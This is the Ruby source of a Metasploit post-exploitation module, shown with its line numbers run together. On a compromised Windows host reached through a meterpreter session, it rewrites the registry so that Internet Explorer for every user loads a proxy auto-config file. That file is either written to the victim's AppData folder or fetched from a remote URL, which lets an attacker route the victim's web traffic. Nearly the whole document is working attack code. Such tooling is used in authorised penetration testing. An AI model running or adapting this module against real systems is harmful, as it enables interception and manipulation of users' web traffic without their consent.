Path: blob/master/modules/post/windows/manage/ie_proxypac.rb
19664 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::Windows::Priv7include Msf::Post::File8include Msf::Post::Windows::Registry910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Windows Manage Proxy PAC File',15'Description' => %q{16This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC17option, a PAC file will be created on the victim host. It's also possible to provide a18remote PAC file (REMOTE_PAC option) by providing the full URL.19},20'License' => MSF_LICENSE,21'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],22'References' => [23[ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],24[ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]25],26'Platform' => 'win',27'SessionTypes' => [ 'meterpreter' ],28'Compat' => {29'Meterpreter' => {30'Commands' => %w[31stdapi_sys_config_getenv32]33}34},35'Notes' => {36'Stability' => [SERVICE_RESOURCE_LOSS],37'SideEffects' => [CONFIG_CHANGES],38'Reliability' => []39}40)41)4243register_options(44[45OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),46OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),47OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),48OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])49]50)51end5253def run54if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?55fail_with(Failure::BadConfig, 'You must set a remote or local PAC file. Aborting...')56end5758if datastore['REMOTE_PAC']59@remote = true60print_status('Setting automatic configuration script from a remote PAC file ...')61res = enable_proxypac(datastore['REMOTE_PAC'])62else63@remote = false64print_status('Setting automatic configuration script from local PAC file ...')65pac_file = create_pac(datastore['LOCAL_PAC'])66unless pac_file67print_error('There were problems creating the PAC proxy file. Aborting...')68return69end70res = enable_proxypac(pac_file)71end72unless res73print_error('Error while setting an automatic configuration script. Aborting...')74return75end7677print_good('Automatic configuration script configured...')7879if datastore['AUTO_DETECT']80print_status('Enabling Automatically Detect Settings...')81unless auto_detect_on82print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')83end84end8586if datastore['DISABLE_PROXY']87print_status('Disabling the Proxy Server...')88unless disable_proxy89print_error('Failed to disable Proxy Server. Proceeding anyway...')90end91end92end9394def create_pac(local_pac)95pac_file = session.sys.config.getenv('APPDATA') << '\\' << "#{Rex::Text.rand_text_alpha(6..13)}.pac"9697unless ::File.exist?(local_pac)98print_error('Local PAC file not found.')99return false100end101102conf_pac = ::File.open(local_pac, 'rb').read103104return false unless write_file(pac_file, conf_pac)105106print_status("PAC proxy configuration file written to #{pac_file}")107return pac_file108end109110def enable_proxypac(pac)111proxy_pac_enabled = false112113registry_enumkeys('HKU').each do |k|114next unless k.include?('S-1-5-21')115next if k.include?('_Classes')116117key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"118value_auto = 'AutoConfigURL'119file = @remote ? pac.to_s : "file://#{pac}"120121begin122res = registry_setvaldata(key, value_auto, file, 'REG_SZ')123rescue ::RuntimeError, Rex::TimeoutError124next125end126127if res.nil? # Rex::Post::Meterpreter::RequestError128next129end130131if change_connection(16, '05', key + '\\Connections')132proxy_pac_enabled = true133end134end135136proxy_pac_enabled137end138139def auto_detect_on140auto_detect_enabled = false141142registry_enumkeys('HKU').each do |k|143next unless k.include? 'S-1-5-21'144next if k.include? '_Classes'145146key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\Connections"147if change_connection(16, '0D', key)148print_good('Automatically Detect Settings on.')149auto_detect_enabled = true150end151end152153auto_detect_enabled154end155156def disable_proxy157value_enable = 'ProxyEnable'158profile = false159160registry_enumkeys('HKU').each do |k|161next unless k.include?('S-1-5-21')162next if k.include?('_Classes')163164key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"165begin166registry_setvaldata(key, value_enable, 0, 'REG_DWORD')167profile = true168rescue ::RuntimeError, Rex::TimeoutError169next170end171end172173if profile174print_good('Proxy disabled.')175return true176end177178return false179end180181def change_connection(offset, value, key)182value_default = 'DefaultConnectionSettings'183begin184value_con = registry_getvaldata(key, value_default)185binary_data = value_con.unpack('H*')[0]186binary_data[offset, 2] = value187registry_setvaldata(key, value_default, ['%x' % binary_data.to_i(16)].pack('H*'), 'REG_BINARY')188rescue ::RuntimeError, Rex::TimeoutError189return false190end191192return true193end194end195196197